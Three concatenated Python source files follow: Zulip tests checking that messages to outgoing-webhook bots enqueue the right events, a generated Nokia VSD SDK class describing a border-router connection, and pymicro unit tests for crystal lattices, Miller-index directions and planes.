        """A PM to an outgoing bot produces a 'private_message' trigger."""
        human_sender = self.example_user('hamlet')
        assert(not human_sender.is_bot)
        bot = self._get_outgoing_bot()
        events = get_service_bot_events(
            sender=human_sender,
            service_bot_tuples=[(bot.id, bot.bot_type)],
            mentioned_user_ids=set(),
            recipient_type=Recipient.PERSONAL,
        )
        self.assertEqual(events, {
            'outgoing_webhooks': [
                {'trigger': 'private_message', 'user_profile_id': bot.id},
            ],
        })

    def test_service_events_for_stream_mentions(self):
        # type: () -> None
        """Mentioning an outgoing bot on a stream produces a 'mention' trigger."""
        human_sender = self.example_user('hamlet')
        assert(not human_sender.is_bot)
        bot = self._get_outgoing_bot()
        events = get_service_bot_events(
            sender=human_sender,
            service_bot_tuples=[(bot.id, bot.bot_type)],
            mentioned_user_ids={bot.id},
            recipient_type=Recipient.STREAM,
        )
        self.assertEqual(events, {
            'outgoing_webhooks': [
                {'trigger': 'mention', 'user_profile_id': bot.id},
            ],
        })

    def test_service_events_for_unsubscribed_stream_mentions(self):
        # type: () -> None
        """
        If an outgoing bot is mentioned on a stream message, we will
        create an event for it even if it is not subscribed to the
        stream and not part of our original `service_bot_tuples`.

        Note that we add Cordelia as a red herring value that the
        code should ignore, since she is not a bot.
        """
        human_sender = self.example_user('hamlet')
        assert(not human_sender.is_bot)
        bot = self._get_outgoing_bot()
        cordelia = self.example_user('cordelia')
        events = get_service_bot_events(
            sender=human_sender,
            service_bot_tuples=[],
            mentioned_user_ids={
                bot.id,
                cordelia.id,  # should be excluded, not a service bot
            },
            recipient_type=Recipient.STREAM,
        )
        self.assertEqual(events, {
            'outgoing_webhooks': [
                {'trigger': 'mention', 'user_profile_id': bot.id},
            ],
        })
class TestServiceBotEventTriggers(ZulipTestCase):
    """End-to-end checks that sending messages enqueues service bot events.

    Each test patches queue_json_publish and verifies whether, and with
    what payload, an event is published on the bot-type's queue.
    """
    def setUp(self):
        # type: () -> None
        self.user_profile = self.example_user("othello")
        # Bot under test; its bot_type is reassigned per case in the tests.
        self.bot_profile = do_create_user(email="foo-bot@zulip.com",
                                          password="test",
                                          realm=get_realm("zulip"),
                                          full_name="FooBot",
                                          short_name="foo-bot",
                                          bot_type=UserProfile.OUTGOING_WEBHOOK_BOT,
                                          bot_owner=self.user_profile)
        # Second bot, used as the message *sender* in the negative tests.
        self.second_bot_profile = do_create_user(email="bar-bot@zulip.com",
                                                 password="test",
                                                 realm=get_realm("zulip"),
                                                 full_name="BarBot",
                                                 short_name="bar-bot",
                                                 bot_type=UserProfile.OUTGOING_WEBHOOK_BOT,
                                                 bot_owner=self.user_profile)
        # TODO: In future versions this won't be required
        self.subscribe(self.bot_profile, 'Denmark')
    @mock.patch('zerver.lib.actions.queue_json_publish')
    def test_trigger_on_stream_mention_from_user(self, mock_queue_json_publish):
        # type: (mock.Mock) -> None
        # A human mentioning the bot on a stream must enqueue a 'mention'
        # event with the full message payload, for every bot type.
        for bot_type, expected_queue_name in BOT_TYPE_TO_QUEUE_NAME.items():
            self.bot_profile.bot_type = bot_type
            self.bot_profile.save()
            content = u'@**FooBot** foo bar!!!'
            recipient = 'Denmark'
            trigger = 'mention'
            message_type = Recipient._type_names[Recipient.STREAM]
            # side_effect runs synchronously inside send_message, so the
            # loop variables above are still current when it fires.
            def check_values_passed(queue_name, trigger_event, x):
                # type: (Any, Union[Mapping[Any, Any], Any], Callable[[Any], None]) -> None
                self.assertEqual(queue_name, expected_queue_name)
                self.assertEqual(trigger_event["failed_tries"], 0)
                self.assertEqual(trigger_event["message"]["content"], content)
                self.assertEqual(trigger_event["message"]["display_recipient"], recipient)
                self.assertEqual(trigger_event["message"]["sender_email"], self.user_profile.email)
                self.assertEqual(trigger_event["message"]["type"], message_type)
                self.assertEqual(trigger_event['trigger'], trigger)
                self.assertEqual(trigger_event['user_profile_id'], self.bot_profile.id)
            mock_queue_json_publish.side_effect = check_values_passed
            self.send_message(
                self.user_profile.email,
                'Denmark',
                Recipient.STREAM,
                content)
            self.assertTrue(mock_queue_json_publish.called)
    @mock.patch('zerver.lib.actions.queue_json_publish')
    def test_no_trigger_on_stream_message_without_mention(self, mock_queue_json_publish):
        # type: (mock.Mock) -> None
        # A plain stream message with no mention must not enqueue anything.
        sender_email = self.user_profile.email
        recipients = "Denmark"
        message_type = Recipient.STREAM
        self.send_message(sender_email, recipients, message_type)
        self.assertFalse(mock_queue_json_publish.called)
    @mock.patch('zerver.lib.actions.queue_json_publish')
    def test_no_trigger_on_stream_mention_from_bot(self, mock_queue_json_publish):
        # type: (mock.Mock) -> None
        # Mentions sent *by another bot* must not enqueue events.
        for bot_type in BOT_TYPE_TO_QUEUE_NAME:
            self.bot_profile.bot_type = bot_type
            self.bot_profile.save()
            self.send_message(
                self.second_bot_profile.email,
                'Denmark',
                Recipient.STREAM,
                u'@**FooBot** foo bar!!!')
            self.assertFalse(mock_queue_json_publish.called)
    @mock.patch('zerver.lib.actions.queue_json_publish')
    def test_trigger_on_personal_message_from_user(self, mock_queue_json_publish):
        # type: (mock.Mock) -> None
        # A human PM to the bot must enqueue a 'private_message' event.
        for bot_type, expected_queue_name in BOT_TYPE_TO_QUEUE_NAME.items():
            self.bot_profile.bot_type = bot_type
            self.bot_profile.save()
            sender_email = self.user_profile.email
            recipient_email = self.bot_profile.email
            message_type = Recipient.PERSONAL
            def check_values_passed(queue_name, trigger_event, x):
                # type: (Any, Union[Mapping[Any, Any], Any], Callable[[Any], None]) -> None
                self.assertEqual(queue_name, expected_queue_name)
                self.assertEqual(trigger_event["user_profile_id"], self.bot_profile.id)
                self.assertEqual(trigger_event["trigger"], "private_message")
                self.assertEqual(trigger_event["failed_tries"], 0)
                self.assertEqual(trigger_event["message"]["sender_email"], sender_email)
                display_recipients = [
                    trigger_event["message"]["display_recipient"][0]["email"],
                    trigger_event["message"]["display_recipient"][1]["email"],
                ]
                self.assertTrue(sender_email in display_recipients)
                self.assertTrue(recipient_email in display_recipients)
            mock_queue_json_publish.side_effect = check_values_passed
            self.send_message(sender_email, recipient_email, message_type, subject='', content='test')
            self.assertTrue(mock_queue_json_publish.called)
    @mock.patch('zerver.lib.actions.queue_json_publish')
    def test_no_trigger_on_personal_message_from_bot(self, mock_queue_json_publish):
        # type: (mock.Mock) -> None
        # A PM from another bot must not enqueue events.
        for bot_type in BOT_TYPE_TO_QUEUE_NAME:
            self.bot_profile.bot_type = bot_type
            self.bot_profile.save()
            sender_email = self.second_bot_profile.email
            recipient_email = self.bot_profile.email
            message_type = Recipient.PERSONAL
            self.send_message(sender_email, recipient_email, message_type)
            self.assertFalse(mock_queue_json_publish.called)
    @mock.patch('zerver.lib.actions.queue_json_publish')
    def test_trigger_on_huddle_message_from_user(self, mock_queue_json_publish):
        # type: (mock.Mock) -> None
        # A huddle including two bots must enqueue one event per bot.
        for bot_type, expected_queue_name in BOT_TYPE_TO_QUEUE_NAME.items():
            self.bot_profile.bot_type = bot_type
            self.bot_profile.save()
            self.second_bot_profile.bot_type = bot_type
            self.second_bot_profile.save()
            sender_email = self.user_profile.email
            recipient_emails = [self.bot_profile.email, self.second_bot_profile.email]
            message_type = Recipient.HUDDLE
            profile_ids = [self.bot_profile.id, self.second_bot_profile.id]
            def check_values_passed(queue_name, trigger_event, x):
                # type: (Any, Union[Mapping[Any, Any], Any], Callable[[Any], None]) -> None
                self.assertEqual(queue_name, expected_queue_name)
                self.assertIn(trigger_event["user_profile_id"], profile_ids)
                # Removing the id ensures each bot is triggered exactly once.
                profile_ids.remove(trigger_event["user_profile_id"])
                self.assertEqual(trigger_event["trigger"], "private_message")
                self.assertEqual(trigger_event["failed_tries"], 0)
                self.assertEqual(trigger_event["message"]["sender_email"], sender_email)
                self.assertEqual(trigger_event["message"]["type"], u'private')
            mock_queue_json_publish.side_effect = check_values_passed
            self.send_message(sender_email, recipient_emails, message_type, subject='', content='test')
            self.assertEqual(mock_queue_json_publish.call_count, 2)
            mock_queue_json_publish.reset_mock()
    @mock.patch('zerver.lib.actions.queue_json_publish')
    def test_no_trigger_on_huddle_message_from_bot(self, mock_queue_json_publish):
        # type: (mock.Mock) -> None
        # A huddle message sent by a bot must not enqueue events.
        for bot_type in BOT_TYPE_TO_QUEUE_NAME:
            self.bot_profile.bot_type = bot_type
            self.bot_profile.save()
            sender_email = self.second_bot_profile.email
            recipient_emails = [self.user_profile.email, self.bot_profile.email]
            message_type = Recipient.HUDDLE
            self.send_message(sender_email, recipient_emails, message_type)
            self.assertFalse(mock_queue_json_publish.called)
|
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from .fetchers import NUPermissionsFetcher
from .fetchers import NUMetadatasFetcher
from .fetchers import NUBFDSessionsFetcher
from .fetchers import NUGlobalMetadatasFetcher
from bambou import NURESTObject
class NUBRConnection(NURESTObject):
    """ Represents a BRConnection in the VSD

        Notes:
            Configuration of VNS Gateway Border Router connection
    """

    # REST names used by bambou to build this resource's URLs.
    __rest_name__ = "brconnection"
    __resource_name__ = "brconnections"

    ## Constants
    # Allowed values for `advertisement_criteria`.
    CONST_ADVERTISEMENT_CRITERIA_OPERATIONAL_LINK = "OPERATIONAL_LINK"
    CONST_ADVERTISEMENT_CRITERIA_BFD = "BFD"
    # Allowed values for `entity_scope`.
    CONST_ENTITY_SCOPE_GLOBAL = "GLOBAL"
    CONST_ENTITY_SCOPE_ENTERPRISE = "ENTERPRISE"
    # Allowed value for `mode`.
    CONST_MODE_STATIC = "Static"
    # Allowed values for `address_family`.
    CONST_ADDRESS_FAMILY_IPV6 = "IPV6"
    CONST_ADDRESS_FAMILY_IPV4 = "IPV4"
    def __init__(self, **kwargs):
        """ Initializes a BRConnection instance

            Notes:
                You can specify all parameters while calling this methods.
                A special argument named `data` will enable you to load the
                object from a Python dictionary

            Examples:
                >>> brconnection = NUBRConnection(id=u'xxxx-xxx-xxx-xxx', name=u'BRConnection')
                >>> brconnection = NUBRConnection(data=my_dict)
        """

        super(NUBRConnection, self).__init__()

        # Read/Write Attributes
        self._dns_address = None
        self._dns_address_v6 = None
        self._last_updated_by = None
        self._last_updated_date = None
        self._gateway = None
        self._gateway_v6 = None
        self._address = None
        self._address_family = None
        self._address_v6 = None
        self._advertisement_criteria = None
        self._netmask = None
        self._embedded_metadata = None
        self._inherited = None
        self._entity_scope = None
        self._mode = None
        self._uplink_id = None
        self._creation_date = None
        self._owner = None
        self._external_id = None

        # Register each local attribute with its remote (VSD API) name,
        # type, and constraints so bambou can (de)serialize it.
        self.expose_attribute(local_name="dns_address", remote_name="DNSAddress", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="dns_address_v6", remote_name="DNSAddressV6", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="last_updated_by", remote_name="lastUpdatedBy", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="last_updated_date", remote_name="lastUpdatedDate", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="gateway", remote_name="gateway", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="gateway_v6", remote_name="gatewayV6", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="address", remote_name="address", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="address_family", remote_name="addressFamily", attribute_type=str, is_required=False, is_unique=False, choices=[u'IPV4', u'IPV6'])
        self.expose_attribute(local_name="address_v6", remote_name="addressV6", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="advertisement_criteria", remote_name="advertisementCriteria", attribute_type=str, is_required=False, is_unique=False, choices=[u'BFD', u'OPERATIONAL_LINK'])
        self.expose_attribute(local_name="netmask", remote_name="netmask", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="embedded_metadata", remote_name="embeddedMetadata", attribute_type=list, is_required=False, is_unique=False)
        self.expose_attribute(local_name="inherited", remote_name="inherited", attribute_type=bool, is_required=False, is_unique=False)
        self.expose_attribute(local_name="entity_scope", remote_name="entityScope", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])
        self.expose_attribute(local_name="mode", remote_name="mode", attribute_type=str, is_required=False, is_unique=False, choices=[u'Static'])
        self.expose_attribute(local_name="uplink_id", remote_name="uplinkID", attribute_type=int, is_required=False, is_unique=False)
        self.expose_attribute(local_name="creation_date", remote_name="creationDate", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="owner", remote_name="owner", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="external_id", remote_name="externalID", attribute_type=str, is_required=False, is_unique=True)

        # Fetchers
        self.permissions = NUPermissionsFetcher.fetcher_with_object(parent_object=self, relationship="child")
        self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
        self.bfd_sessions = NUBFDSessionsFetcher.fetcher_with_object(parent_object=self, relationship="child")
        self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")

        # Apply any constructor keyword arguments (including `data`).
        self._compute_args(**kwargs)
# Properties
    # NOTE(review): the expose_attribute declaration for this attribute is not
    # visible in this chunk; the value is presumably a str -- confirm.
    @property
    def dns_address(self):
        """ Get dns_address value.
            Notes:
                DNS Address for the vlan.
                This attribute is named `DNSAddress` in VSD API.
        """
        return self._dns_address
    @dns_address.setter
    def dns_address(self, value):
        """ Set dns_address value.
            Notes:
                DNS Address for the vlan.
                This attribute is named `DNSAddress` in VSD API.
        """
        self._dns_address = value
    # NOTE(review): the expose_attribute declaration for this attribute is not
    # visible in this chunk; the value is presumably a str -- confirm.
    @property
    def dns_address_v6(self):
        """ Get dns_address_v6 value.
            Notes:
                DNS IPv6 Address.
                This attribute is named `DNSAddressV6` in VSD API.
        """
        return self._dns_address_v6
    @dns_address_v6.setter
    def dns_address_v6(self, value):
        """ Set dns_address_v6 value.
            Notes:
                DNS IPv6 Address.
                This attribute is named `DNSAddressV6` in VSD API.
        """
        self._dns_address_v6 = value
    # NOTE(review): the expose_attribute declaration for this attribute is not
    # visible in this chunk; the value is presumably a str (user ID) -- confirm.
    @property
    def last_updated_by(self):
        """ Get last_updated_by value.
            Notes:
                ID of the user who last updated the object.
                This attribute is named `lastUpdatedBy` in VSD API.
        """
        return self._last_updated_by
    @last_updated_by.setter
    def last_updated_by(self, value):
        """ Set last_updated_by value.
            Notes:
                ID of the user who last updated the object.
                This attribute is named `lastUpdatedBy` in VSD API.
        """
        self._last_updated_by = value
    # NOTE(review): the expose_attribute declaration for this attribute is not
    # visible in this chunk; presumably a str timestamp -- confirm.
    @property
    def last_updated_date(self):
        """ Get last_updated_date value.
            Notes:
                Time stamp when this object was last updated.
                This attribute is named `lastUpdatedDate` in VSD API.
        """
        return self._last_updated_date
    @last_updated_date.setter
    def last_updated_date(self, value):
        """ Set last_updated_date value.
            Notes:
                Time stamp when this object was last updated.
                This attribute is named `lastUpdatedDate` in VSD API.
        """
        self._last_updated_date = value
    # NOTE(review): the expose_attribute declaration for this attribute is not
    # visible in this chunk; the value is presumably a str -- confirm.
    @property
    def gateway(self):
        """ Get gateway value.
            Notes:
                IP address of the gateway bound to the VLAN.
        """
        return self._gateway
    @gateway.setter
    def gateway(self, value):
        """ Set gateway value.
            Notes:
                IP address of the gateway bound to the VLAN.
        """
        self._gateway = value
    # NOTE(review): the expose_attribute declaration for this attribute is not
    # visible in this chunk; the value is presumably a str -- confirm.
    @property
    def gateway_v6(self):
        """ Get gateway_v6 value.
            Notes:
                IPv6 address of the gateway bound to the port.
                This attribute is named `gatewayV6` in VSD API.
        """
        return self._gateway_v6
    @gateway_v6.setter
    def gateway_v6(self, value):
        """ Set gateway_v6 value.
            Notes:
                IPv6 address of the gateway bound to the port.
                This attribute is named `gatewayV6` in VSD API.
        """
        self._gateway_v6 = value
    # NOTE(review): the expose_attribute declaration for this attribute is not
    # visible in this chunk; the value is presumably a str -- confirm.
    @property
    def address(self):
        """ Get address value.
            Notes:
                Static IP address for the VLAN on which the BR Connection is created.
        """
        return self._address
    @address.setter
    def address(self, value):
        """ Set address value.
            Notes:
                Static IP address for the VLAN on which the BR Connection is created.
        """
        self._address = value
    @property
    def address_family(self) -> str:
        """ Get address_family value.
            Notes:
                IP address family of this BRConnection.
                Allowed values: `IPV4`, `IPV6`.
                This attribute is named `addressFamily` in VSD API.
        """
        return self._address_family
    @address_family.setter
    def address_family(self, value: str):
        """ Set address_family value.
            Notes:
                IP address family of this BRConnection.
                Allowed values: `IPV4`, `IPV6`.
                This attribute is named `addressFamily` in VSD API.
        """
        self._address_family = value
    @property
    def address_v6(self) -> str:
        """ Get address_v6 value.
            Notes:
                IPv6 address for static configuration on the BR Connection instance.
                This attribute is named `addressV6` in VSD API.
        """
        return self._address_v6
    @address_v6.setter
    def address_v6(self, value: str):
        """ Set address_v6 value.
            Notes:
                IPv6 address for static configuration on the BR Connection instance.
                This attribute is named `addressV6` in VSD API.
        """
        self._address_v6 = value
    @property
    def advertisement_criteria(self) -> str:
        """ Get advertisement_criteria value.
            Notes:
                Advertisement Criteria for Traffic Flow on a BR Connection.
                Allowed values: `BFD`, `OPERATIONAL_LINK`.
                This attribute is named `advertisementCriteria` in VSD API.
        """
        return self._advertisement_criteria
    @advertisement_criteria.setter
    def advertisement_criteria(self, value: str):
        """ Set advertisement_criteria value.
            Notes:
                Advertisement Criteria for Traffic Flow on a BR Connection.
                Allowed values: `BFD`, `OPERATIONAL_LINK`.
                This attribute is named `advertisementCriteria` in VSD API.
        """
        self._advertisement_criteria = value
    @property
    def netmask(self) -> str:
        """ Get netmask value.
            Notes:
                Network mask of the static configuration.
        """
        return self._netmask
    @netmask.setter
    def netmask(self, value: str):
        """ Set netmask value.
            Notes:
                Network mask of the static configuration.
        """
        self._netmask = value
    @property
    def embedded_metadata(self) -> list:
        """ Get embedded_metadata value.
            Notes:
                Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.
                This attribute is named `embeddedMetadata` in VSD API.
        """
        return self._embedded_metadata
    @embedded_metadata.setter
    def embedded_metadata(self, value: list):
        """ Set embedded_metadata value.
            Notes:
                Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.
                This attribute is named `embeddedMetadata` in VSD API.
        """
        self._embedded_metadata = value
    @property
    def inherited(self) -> bool:
        """ Get inherited value.
            Notes:
                This flag will determine if the abstract connection is inherited from the instance template.
        """
        return self._inherited
    @inherited.setter
    def inherited(self, value: bool):
        """ Set inherited value.
            Notes:
                This flag will determine if the abstract connection is inherited from the instance template.
        """
        self._inherited = value
    @property
    def entity_scope(self) -> str:
        """ Get entity_scope value.
            Notes:
                Specify if scope of entity is Data center or Enterprise level.
                Allowed values: `ENTERPRISE`, `GLOBAL`.
                This attribute is named `entityScope` in VSD API.
        """
        return self._entity_scope
    @entity_scope.setter
    def entity_scope(self, value: str):
        """ Set entity_scope value.
            Notes:
                Specify if scope of entity is Data center or Enterprise level.
                Allowed values: `ENTERPRISE`, `GLOBAL`.
                This attribute is named `entityScope` in VSD API.
        """
        self._entity_scope = value
    @property
    def mode(self) -> str:
        """ Get mode value.
            Notes:
                Connection mode: Only static is allowed on a Bridge Router Connection.
                Allowed values: `Static`.
        """
        return self._mode
    @mode.setter
    def mode(self, value: str):
        """ Set mode value.
            Notes:
                Connection mode: Only static is allowed on a Bridge Router Connection.
                Allowed values: `Static`.
        """
        self._mode = value
    @property
    def uplink_id(self) -> int:
        """ Get uplink_id value.
            Notes:
                Internally generated ID in the range that idenitifies the uplink within the context of NSG.
                This attribute is named `uplinkID` in VSD API.
        """
        return self._uplink_id
    @uplink_id.setter
    def uplink_id(self, value: int):
        """ Set uplink_id value.
            Notes:
                Internally generated ID in the range that idenitifies the uplink within the context of NSG.
                This attribute is named `uplinkID` in VSD API.
        """
        self._uplink_id = value
    @property
    def creation_date(self) -> str:
        """ Get creation_date value.
            Notes:
                Time stamp when this object was created.
                This attribute is named `creationDate` in VSD API.
        """
        return self._creation_date
    @creation_date.setter
    def creation_date(self, value: str):
        """ Set creation_date value.
            Notes:
                Time stamp when this object was created.
                This attribute is named `creationDate` in VSD API.
        """
        self._creation_date = value
    @property
    def owner(self) -> str:
        """ Get owner value.
            Notes:
                Identifies the user that has created this object.
        """
        return self._owner
    @owner.setter
    def owner(self, value: str):
        """ Set owner value.
            Notes:
                Identifies the user that has created this object.
        """
        self._owner = value
    @property
    def external_id(self) -> str:
        """ Get external_id value.
            Notes:
                External object ID. Used for integration with third party systems.
                Declared unique in the corresponding expose_attribute call.
                This attribute is named `externalID` in VSD API.
        """
        return self._external_id
    @external_id.setter
    def external_id(self, value: str):
        """ Set external_id value.
            Notes:
                External object ID. Used for integration with third party systems.
                This attribute is named `externalID` in VSD API.
        """
        self._external_id = value
|
|
import unittest
import numpy as np
from math import pi, cos, sin, acos, atan
from pymicro.crystal.lattice import Lattice, CrystallinePhase, Symmetry, HklObject, HklDirection, HklPlane, SlipSystem
class LatticeTests(unittest.TestCase):
    """Unit tests for the Lattice class."""

    def setUp(self):
        print('testing the Lattice class')

    def test_equality(self):
        """Lattices built from the same matrix and symmetry must compare equal."""
        from_factory = Lattice.cubic(0.5)
        matrix = np.array([[0.5, 0., 0.],
                           [0., 0.5, 0.],
                           [0., 0., 0.5]])
        from_matrix = Lattice(matrix, symmetry=Symmetry.cubic)
        self.assertEqual(from_factory, from_matrix)

    def test_cubic(self):
        """The cubic factory must produce a diagonal lattice matrix."""
        expected = np.array([[0.5, 0., 0.],
                             [0., 0.5, 0.],
                             [0., 0., 0.5]])
        lattice = Lattice.cubic(0.5)
        for row in range(3):
            for col in range(3):
                self.assertEqual(lattice.matrix[row][col], expected[row][col])

    def test_volume(self):
        """A cubic lattice with edge a has volume a**3."""
        self.assertAlmostEqual(Lattice.cubic(0.5).volume(), 0.125)

    def test_from_symbol(self):
        """Aluminium: cubic, a = 0.40495 nm, all angles 90 degrees."""
        al = Lattice.from_symbol('Al')
        for axis in range(3):
            self.assertAlmostEqual(al._lengths[axis], 0.40495, 4)
            self.assertEqual(al._angles[axis], 90.0)

    def test_reciprocal_lattice(self):
        """Check the reciprocal basis of a monoclinic lattice component-wise."""
        Mg2Si = Lattice.from_parameters(1.534, 0.405, 0.683, 90., 106., 90., x_aligned_with_a=False)
        reciprocal = Mg2Si.reciprocal_lattice()
        expected = [(0.678, 0., 0.),
                    (0., 2.469, 0.),
                    (0.420, 0., 1.464)]
        for vector, components in zip(reciprocal, expected):
            for actual, reference in zip(vector, components):
                self.assertAlmostEqual(actual, reference, 3)
class CrystallinePhaseTests(unittest.TestCase):
    """Unit tests for the CrystallinePhase class."""

    def setUp(self):
        print('testing the CrystallinePhase class')

    def test_init(self):
        """A phase created with only a name keeps that name and gets id 1."""
        test_phase = CrystallinePhase(name='test')
        self.assertEqual(test_phase.name, 'test')
        self.assertEqual(test_phase.phase_id, 1)
class HklDirectionTests(unittest.TestCase):
    """Unit tests for the HklDirection class."""
    def setUp(self):
        print('testing the HklDirection class')
    def test_angle_between_directions(self):
        """Angles between <100>, <110> and <111> type directions (cubic lattice)."""
        d111 = HklDirection(1, 1, 1)
        d110 = HklDirection(1, 1, 0)
        d100 = HklDirection(1, 0, 0)
        dm111 = HklDirection(-1, 1, 1)
        self.assertAlmostEqual(d100.angle_with_direction(d110) * 180 / np.pi, 45.0)
        self.assertAlmostEqual(d111.angle_with_direction(d110) * 180 / np.pi, 35.26, 2)
        self.assertAlmostEqual(d111.angle_with_direction(dm111) * 180 / np.pi, 70.528, 2)
    def test_tetragonal_direction(self):
        """Cartesian components of directions in a body-centered tetragonal lattice."""
        bct = Lattice.body_centered_tetragonal(0.28, 0.40)
        d111 = HklDirection(1, 1, 1, bct)
        d110 = HklDirection(1, 1, 0, bct)
        self.assertAlmostEqual(d111.direction()[0], 0.49746834, 5)
        self.assertAlmostEqual(d111.direction()[1], 0.49746834, 5)
        self.assertAlmostEqual(d111.direction()[2], 0.71066905, 5)
        self.assertAlmostEqual(d110.direction()[0], 0.707106781, 5)
        self.assertAlmostEqual(d110.direction()[1], 0.707106781, 5)
        self.assertAlmostEqual(d110.direction()[2], 0.0, 5)
    def test_tetragonal_direction2(self):
        """[111] direction in tetragonal ZrO2 against a hand-computed unit vector."""
        ZrO2 = Lattice.tetragonal(0.364, 0.527)
        d = HklDirection(1, 1, 1, ZrO2)
        # expected direction: (1, 1, c/a) normalized, c/a = 0.527/0.364 = 1.448
        target = np.array([1., 1., 1.448])
        target /= np.linalg.norm(target)
        self.assertAlmostEqual(d.direction()[0], target[0], 4)
        self.assertAlmostEqual(d.direction()[1], target[1], 4)
        self.assertAlmostEqual(d.direction()[2], target[2], 4)
    def test_angle_with_directions(self):
        """Angle between two directions in an orthorhombic (olivine) lattice."""
        (a, b, c) = (1.022, 0.596, 0.481)
        olivine = Lattice.orthorhombic(a, b, c)
        (h1, k1, l1) = (1., 1., 1.)
        (h2, k2, l2) = (3., 3., 2.)
        d1 = HklDirection(h1, k1, l1, olivine)
        d2 = HklDirection(h2, k2, l2, olivine)
        # compare with formula in orthorhombic lattice, angle must be 6.589 degrees
        angle = np.arccos(((h1 * h2 * a ** 2) + (k1 * k2 * b ** 2) + (l1 * l2 * c ** 2)) /
                          (np.sqrt(a ** 2 * h1 ** 2 + b ** 2 * k1 ** 2 + c ** 2 * l1 ** 2) *
                           np.sqrt(a ** 2 * h2 ** 2 + b ** 2 * k2 ** 2 + c ** 2 * l2 ** 2)))
        self.assertAlmostEqual(d1.angle_with_direction(d2), angle)
    def test_skip_higher_order(self):
        """skip_higher_order removes planes that are multiples of a lower-order plane."""
        uvw = HklDirection(3, 3, 1)
        hkl_planes = uvw.find_planes_in_zone(max_miller=3)
        self.assertEqual(len(hkl_planes), 18)
        hkl_planes2 = HklObject.skip_higher_order(hkl_planes)
        self.assertEqual(len(hkl_planes2), 7)
    def test_4indices_representation(self):
        """Round-trip between three-index [uvw] and four-index [UVTW] directions."""
        u, v, w = HklDirection.four_to_three_indices(2, -1, -1, 0)
        self.assertEqual(u, 1)
        self.assertEqual(v, 0)
        self.assertEqual(w, 0)
        u, v, w = HklDirection.four_to_three_indices(1, 0, -1, 1)
        self.assertEqual(u, 2)
        self.assertEqual(v, 1)
        self.assertEqual(w, 1)
        U, V, T, W = HklDirection.three_to_four_indices(1, 1, 1)
        self.assertEqual(U, 1)
        self.assertEqual(V, 1)
        self.assertEqual(T, -2)
        self.assertEqual(W, 3)
        U, V, T, W = HklDirection.three_to_four_indices(2, 1, 0)
        self.assertEqual(U, 1)
        self.assertEqual(V, 0)
        self.assertEqual(T, -1)
        self.assertEqual(W, 0)
class HklPlaneTests(unittest.TestCase):
    """Unit tests for the HklPlane class."""
    def setUp(self):
        print('testing the HklPlane class')
        # hexagonal lattice shared by several tests; lengths in nm
        self.hex = Lattice.hexagonal(0.2931, 0.4694)
    def test_equality(self):
        """Planes with identical Miller indices compare equal."""
        p1 = HklPlane(1, 1, 1)
        p2 = HklPlane(1, 1, 1)
        p3 = HklPlane(-1, 1, 1)
        self.assertEqual(p1, p2)
        self.assertTrue(p1 == p2)
        self.assertTrue(p1 != p3)
    def test_HklPlane(self):
        """A plane normal is a unit vector."""
        p = HklPlane(1, 1, 1)
        n = p.normal()
        self.assertEqual(np.linalg.norm(n), 1)
    def test_get_family(self):
        """Family sizes for cubic, tetragonal and hexagonal symmetries,
        with and without Friedel pairs."""
        self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.cubic)), 3)
        self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 6)
        self.assertEqual(len(HklPlane.get_family('111', crystal_structure=Symmetry.cubic)), 4)
        self.assertEqual(len(HklPlane.get_family('111', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 8)
        self.assertEqual(len(HklPlane.get_family('011', crystal_structure=Symmetry.cubic)), 6)
        self.assertEqual(len(HklPlane.get_family('011', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 12)
